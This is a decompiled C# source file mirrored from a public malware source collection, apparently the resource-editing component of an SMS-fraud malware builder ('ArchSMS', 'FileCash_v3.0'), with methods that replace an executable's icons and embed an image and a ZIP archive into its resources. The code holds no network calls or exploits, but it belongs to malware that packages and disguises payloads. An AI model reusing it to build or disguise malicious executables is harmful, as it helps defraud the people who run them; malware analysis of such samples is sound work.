mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-21 18:29:26 +00:00
vxunderground
128 lines
5.3 KiB
C#
128 lines
5.3 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: EnumResNamesCS.ResourceChanger
|
|
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
|
|
|
|
using System;
|
|
using System.IO;
|
|
using System.Runtime.InteropServices;
|
|
using System.Windows.Forms;
|
|
|
|
namespace EnumResNamesCS
|
|
{
|
|
internal class ResourceChanger
|
|
{
|
|
private const uint RT_CURSOR = 1;
|
|
private const uint RT_BITMAP = 2;
|
|
private const uint RT_ICON = 3;
|
|
private const uint RT_MENU = 4;
|
|
private const uint RT_DIALOG = 5;
|
|
private const uint RT_STRING = 6;
|
|
private const uint RT_FONTDIR = 7;
|
|
private const uint RT_FONT = 8;
|
|
private const uint RT_ACCELERATOR = 9;
|
|
private const uint RT_RCDATA = 16;
|
|
private const uint RT_MESSAGETABLE = 17;
|
|
private const uint RT_GROUP_ICON = 196608;
|
|
private const uint LOAD_LIBRARY_AS_DATAFILE = 2;
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern bool FreeLibrary(IntPtr hModule);
|
|
|
|
[DllImport("kernel32.dll", EntryPoint = "EnumResourceNamesW", CharSet = CharSet.Unicode, SetLastError = true)]
|
|
private static extern bool EnumResourceNamesWithName(
|
|
IntPtr hModule,
|
|
string lpszType,
|
|
ResourceChanger.EnumResNameDelegate lpEnumFunc,
|
|
IntPtr lParam);
|
|
|
|
[DllImport("kernel32.dll", EntryPoint = "EnumResourceNamesW", CharSet = CharSet.Unicode, SetLastError = true)]
|
|
private static extern bool EnumResourceNamesWithID(
|
|
IntPtr hModule,
|
|
uint lpszType,
|
|
ResourceChanger.EnumResNameDelegate lpEnumFunc,
|
|
IntPtr lParam);
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern IntPtr BeginUpdateResource(
|
|
string pFileName,
|
|
[MarshalAs(UnmanagedType.Bool)] bool bDeleteExistingResources);
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern bool UpdateResource(
|
|
IntPtr hUpdate,
|
|
uint lpType,
|
|
uint lpName,
|
|
ushort wLanguage,
|
|
byte[] lpData,
|
|
uint cbData);
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern bool EndUpdateResource(IntPtr hUpdate, bool fDiscard);
|
|
|
|
private static bool IS_INTRESOURCE(IntPtr value) => (uint) (int) value <= (uint) ushort.MaxValue;
|
|
|
|
private static uint GET_RESOURCE_ID(IntPtr value) => ResourceChanger.IS_INTRESOURCE(value) ? (uint) (int) value : throw new NotSupportedException("value is not an ID!");
|
|
|
|
private static string GET_RESOURCE_NAME(IntPtr value) => ResourceChanger.IS_INTRESOURCE(value) ? value.ToString() : Marshal.PtrToStringUni(value);
|
|
|
|
public void ClearIcons(string exe)
|
|
{
|
|
IntPtr hModule = ResourceChanger.LoadLibraryEx(exe, IntPtr.Zero, 2U);
|
|
if (!ResourceChanger.EnumResourceNamesWithID(hModule, 3U, new ResourceChanger.EnumResNameDelegate(this.EnumRes), IntPtr.Zero))
|
|
{
|
|
int num = (int) MessageBox.Show("gle: " + Marshal.GetLastWin32Error().ToString());
|
|
}
|
|
ResourceChanger.FreeLibrary(hModule);
|
|
}
|
|
|
|
public bool EnumRes(IntPtr hModule, IntPtr lpszType, IntPtr lpszName, IntPtr lParam) => true;
|
|
|
|
public void ChangeIcon(string exe, string ico)
|
|
{
|
|
IntPtr hUpdate = ResourceChanger.BeginUpdateResource(exe, false);
|
|
using (BinaryReader binaryReader = new BinaryReader((Stream) new FileStream(ico, FileMode.Open)))
|
|
{
|
|
int num1 = (int) binaryReader.ReadInt16();
|
|
int num2 = (int) binaryReader.ReadInt16();
|
|
if (num1 != 0 || num2 != 1)
|
|
throw new Exception("Invalid .ico file format");
|
|
long num3 = (long) binaryReader.ReadInt16();
|
|
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(1), (ushort) 0, (byte[]) null, 0U);
|
|
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(2), (ushort) 0, (byte[]) null, 0U);
|
|
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(3), (ushort) 0, (byte[]) null, 0U);
|
|
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(4), (ushort) 0, (byte[]) null, 0U);
|
|
ResourceChanger.UpdateResource(hUpdate, 14U, Convert.ToUInt32(128), (ushort) 0, (byte[]) null, 0U);
|
|
ResourceChanger.EndUpdateResource(hUpdate, false);
|
|
}
|
|
ResourceChanger.EndUpdateResource(hUpdate, false);
|
|
}
|
|
|
|
public void AddImg(string exe, string img, uint id = 88)
|
|
{
|
|
IntPtr hUpdate = ResourceChanger.BeginUpdateResource(exe, false);
|
|
byte[] lpData = File.ReadAllBytes(img);
|
|
ResourceChanger.UpdateResource(hUpdate, 10U, id, (ushort) 0, lpData, (uint) lpData.Length);
|
|
ResourceChanger.EndUpdateResource(hUpdate, false);
|
|
}
|
|
|
|
public void AddZIP(string exe, string zip, uint id = 89)
|
|
{
|
|
IntPtr hUpdate = ResourceChanger.BeginUpdateResource(exe, false);
|
|
byte[] lpData = File.ReadAllBytes(zip);
|
|
ResourceChanger.UpdateResource(hUpdate, 10U, id, (ushort) 0, lpData, (uint) lpData.Length);
|
|
ResourceChanger.EndUpdateResource(hUpdate, false);
|
|
}
|
|
|
|
private delegate bool EnumResNameDelegate(
|
|
IntPtr hModule,
|
|
IntPtr lpszType,
|
|
IntPtr lpszName,
|
|
IntPtr lParam);
|
|
}
|
|
}
|